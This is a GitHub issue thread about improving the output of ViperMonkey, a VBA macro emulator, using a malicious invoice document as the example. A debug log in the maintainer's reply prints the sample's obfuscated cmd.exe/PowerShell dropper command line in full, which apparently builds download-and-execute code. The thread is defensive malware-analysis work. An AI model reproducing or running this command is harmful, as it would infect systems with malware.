ViperMonkey icon indicating copy to clipboard operation
ViperMonkey copied to clipboard
verified publisher icon decalage2

Make vmonkey's output more meaningful

Open Idriel opened this issue 7 years ago • 4 comments

Sorry if this is not a place to Ask something like this. ;)

This is the Result of the Macro. There are lot's of warnings but I am not any smarter what Shell Function will run. :( MD5: 5533c54f77659ee6198c3e6f5485e6f2

TRACING VBA CODE (entrypoint = Auto*):
INFO     ACTION: Found Entry Point - params 'document_open' - 
INFO     evaluating Sub Document_open
WARNING  Variable 'IHLqsQXuiXFKJAfSwJF' not found
WARNING  Variable 'HGUhvqSdZdmpItfnMQ' not found
WARNING  Variable 'BLkIKAsQYliSmBzjNbMVsVv' not found
WARNING  Variable 'ARcoFzOaDwBFuiVKHisonKIU' not found
WARNING  Variable 'qKfcSRJGtsdcKz' not found
WARNING  Variable 'BTLBQCLmccAvmzIV' not found
WARNING  Variable 'zJiNQoMptPUvfhVZFAUvQr' not found
WARNING  Variable 'PJrOIZsqbwTjwnzwF' not found
INFO     calling Function: Shapes('zTnWboDjz')
INFO     Looking up doc var shapes('ztnwbodjz').textframe
WARNING  Variable 'jYwhGpospcJhTCQICNLDYTiw' not found
INFO     Looking up doc var kqshztn.containingrange
WARNING  Variable 'fbvuwib' not found
WARNING  Variable 'UcmjJE' not found
WARNING  Variable 'qXHBh' not found
WARNING  Variable 'KVVVQoFw' not found
WARNING  Variable 'BzpHpla' not found
WARNING  Variable 'aFQsUEr' not found
WARNING  Variable 'idLnl' not found
WARNING  Variable 'vlNFC' not found
WARNING  Variable 'RLIBq' not found
WARNING  Variable 'DoiJb' not found
WARNING  Variable 'waHtfjE' not found
WARNING  Variable 'zbVzcnDwwoiqjDnUHQkT' not found
WARNING  Variable 'rzKnTXbpvNbwGbjEEJVBaBP' not found
WARNING  Variable 'lJTSWACZprkOSHCNhVTB' not found
WARNING  Variable 'TapSUSsHXiNHFzVpLu' not found
WARNING  Variable 'bMjiiU' not found
WARNING  Variable 'dOjutwL' not found
WARNING  Variable 'tmRQGMYr' not found
INFO     calling Function: Shell('KqShZtn.ContainingRange', 0)
INFO     Shell('KqShZtn.ContainingRange')
INFO     ACTION: Execute Command - params 'KqShZtn.ContainingRange' - Shell function
WARNING  Variable 'MumMhwRW' not found
INFO     calling Function: Array('NULL', 'NULL', 'NULL', 0, 'NULL')
WARNING  Variable 'jSzXLUGKWHsnmlGnfw' not found
Recorded Actions:
+-------------------+-------------------------+----------------+
| Action            | Parameters              | Description    |
+-------------------+-------------------------+----------------+
| Found Entry Point | document_open           |                |
| Execute Command   | KqShZtn.ContainingRange | Shell function |
+-------------------+-------------------------+----------------+

VBA Builtins Called: ['Array', 'Chr', 'Shapes', 'Shell']

Idriel avatar Dec 05 '18 08:12 Idriel

This is how it looks like in Dynamic Analysis

https://app.any.run/tasks/cff7a8e4-11e3-40b2-952e-9f46f00061be

Idriel avatar Dec 05 '18 10:12 Idriel

You are right that the output is not very helpful in this case. The latest version of ViperMonkey handles Shape objects (which are used here), and you get a little bit more info when adding the option -l debug.

decalage2 avatar Dec 05 '18 10:12 decalage2

This is what I get in the output:

>vmonkey.py "New invoice 4M087877.doc" -l debug

[...]

DEBUG    Added potential VBA Shape text "Shapes('1').TextFrame.ContainingRange" = 'c:\\pNFTSIZoiOhGn\\siEQUPlKNA\\pMtTRHl\\..\\..\\..\\windows\\system32\\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set ZKQx=sMMVAWUpvjConpcnZpcYNgz\\8O\'{m(.r/@HF 6TxSu1),LIh=05$D}EG9Xy3+2PeBlqf:tdaw;K-biRkJ&&for %t in (51;41;78;25;48;26;35;72;79;26;73;51;35;28;66;48;15;63;72;75;11;76;9;63;18;69;36;20;63;69;30;5;63;76;10;65;77;63;15;69;73;51;72;67;66;48;26;47;69;69;17;68;32;32;21;31;71;15;67;31;63;77;69;71;0;30;18;11;28;30;76;31;32;80;35;49;76;70;54;76;33;47;69;69;17;68;32;32;9;63;67;67;72;63;63;79;0;17;47;11;69;11;21;31;71;17;47;58;30;18;11;28;32;8;37;78;42;33;47;69;69;17;68;32;32;71;70;8;71;15;69;63;18;47;15;11;65;11;21;77;63;0;30;18;11;28;32;54;11;62;50;33;47;69;69;17;68;32;32;70;31;18;71;31;31;77;18;11;30;18;11;28;30;76;31;32;71;71;22;52;6;16;33;47;69;69;17;68;32;32;17;31;63;71;31;77;0;30;76;63;32;5;46;26;30;40;17;65;77;69;29;26;33;26;43;73;51;2;3;46;48;26;45;74;76;26;73;51;70;40;38;36;48;36;26;61;59;56;26;73;51;34;20;25;48;26;20;35;70;26;73;51;25;5;65;48;51;63;15;8;68;69;63;28;17;60;26;23;26;60;51;70;40;38;60;26;30;63;39;63;26;73;67;11;31;63;71;18;47;29;51;20;71;28;36;77;15;36;51;72;67;66;43;27;69;31;58;27;51;35;28;66;30;52;11;72;15;65;11;71;70;35;77;65;63;29;51;20;71;28;44;36;51;25;5;65;43;73;51;64;71;62;48;26;47;35;34;26;73;46;67;36;29;29;55;63;69;75;46;69;63;28;36;51;25;5;65;43;30;65;63;15;21;69;47;36;75;21;63;36;24;49;49;49;49;43;36;27;46;15;8;11;79;63;75;46;69;63;28;36;51;25;5;65;73;51;64;57;11;48;26;22;69;4;26;73;76;31;63;71;79;73;53;53;18;71;69;18;47;27;53;53;51;62;3;0;48;26;72;64;54;26;73;83)do set 28=!28!!ZKQx:~%t,1!&&if %t gtr 82 powershell "!28:~4!""' to doc_vars.

I agree vmonkey's output could be much better, we need to improve it.

decalage2 avatar Dec 05 '18 11:12 decalage2

Thanks. Didn't try with Debug Dev latest. Now I tried and I also get the same output. Thank you.

Idriel avatar Dec 05 '18 11:12 Idriel